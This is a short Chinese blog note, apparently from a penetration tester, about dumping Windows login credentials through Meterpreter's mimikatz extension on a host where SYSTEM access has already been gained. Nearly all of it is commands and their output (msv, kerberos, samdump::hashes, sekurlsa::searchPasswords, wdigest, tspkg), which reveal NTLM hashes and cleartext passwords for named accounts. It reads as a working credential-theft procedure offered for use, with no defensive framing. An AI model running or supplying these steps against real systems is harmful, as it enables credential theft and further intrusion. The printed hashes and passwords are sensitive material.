今天测试某个站点时读hash老出错 这里做下读hash的笔记
进去meterpreter后getuid一
|
1
2
|
meterpreter > getuidServer username: NT AUTHORITYSYSTEM |
加载mimikatz模块
|
1
2
|
meterpreter > load mimikatzLoading extension mimikatz...Success. |
加载成功.
获取登录密码的hash值
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > msv[+] Running as SYSTEM[*] Retrieving msv credentialsmsv credentials===============AuthID Package Domain User Password------ ------- ------ ---- --------0;334101 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }0;334068 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)0;996 Negotiate WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO)0;49101 NTLM n.s. (Credentials KO)0;999 NTLM WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO) |
上面已经是得到hash值了. 下面算明文密码.
获取明文密码
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > kerberos[+] Running as SYSTEM[*] Retrieving kerberos credentialskerberos credentials====================AuthID Package Domain User Password------ ------- ------ ---- --------0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP CHENGLEE-PC$ 0;49101 NTLM 0;999 NTLM WORKGROUP CHENGLEE-PC$ 0;334101 NTLM chenglee-PC chenglee lizhenghua0;334068 NTLM chenglee-PC chenglee lizhenghua |
拿到登录的明文密码了.
不过也有一些特殊的情况, 例如这样
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > kerberos[+] Running as SYSTEM[*] Retrieving kerberos credentialskerberos credentials====================AuthID Package Domain User Password------ ------- ------ ---- --------0;10408969 NTLM CLOUDVM Administrator0;266228 NTLM CLOUDVM Administrator0;997 Negotiate NT AUTHORITY LOCAL SERVICE0;996 Negotiate WORKGROUP CLOUDVM$0;23595 NTLM0;999 NTLM WORKGROUP CLOUDVM$ |
哈希值也获取不到,
使用另一种方式获取哈希值
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
meterpreter > mimikatz_command -f samdump::hashesOrdinateur : chenglee-PCBootKey : 0648ced51b6060bed1a3654e0ee0fd93Rid : 500User : AdministratorLM :NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0Rid : 501User : GuestLM :NTLM :Rid : 1000User : chengleeLM :NTLM : 8d0f8e1a18236379538411a9056799f5 |
ok, 获取到了,
根据上面的方式获取明文密码
|
1
2
3
4
5
6
7
8
|
meterpreter > mimikatz_command -f sekurlsa::searchPasswords[0] { chenglee ; chenglee-PC ; lizhenghua }[1] { chenglee ; chenglee-PC ; lizhenghua }[2] { chenglee ; chenglee-PC ; lizhenghua }[3] { chenglee ; chenglee-PC ; lizhenghua }[4] { chenglee-PC ; chenglee ; lizhenghua }[5] { chenglee-PC ; chenglee ; lizhenghua }meterpreter > |
2
|
1
2
3
|
meterpreter > mimikatz_command -f sekurlsa::searchPasswords[0] { Administrator ; CLOUDVM ; 1244567 }[1] { Administrator ; CLOUDVM ; 1244567 } |
都拿到了
另外提一下更简洁的方式,就是 wdigest命令了,
这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest.
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > wdigest[+] Running as SYSTEM[*] Retrieving wdigest credentialswdigest credentials===================AuthID Package Domain User Password------ ------- ------ ---- --------0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP CHENGLEE-PC$ 0;49101 NTLM 0;999 NTLM WORKGROUP CHENGLEE-PC$ 0;334101 NTLM chenglee-PC chenglee lizhenghua0;334068 NTLM chenglee-PC chenglee lizhenghua |
还有一个跟wdigest一样的就是tspkg啦
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > tspkg[+] Running as SYSTEM[*] Retrieving tspkg credentialstspkg credentials=================AuthID Package Domain User Password------ ------- ------ ---- --------0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP CHENGLEE-PC$ 0;49101 NTLM 0;999 NTLM WORKGROUP CHENGLEE-PC$ 0;334101 NTLM chenglee-PC chenglee lizhenghua0;334068 NTLM chenglee-PC chenglee lizhenghua |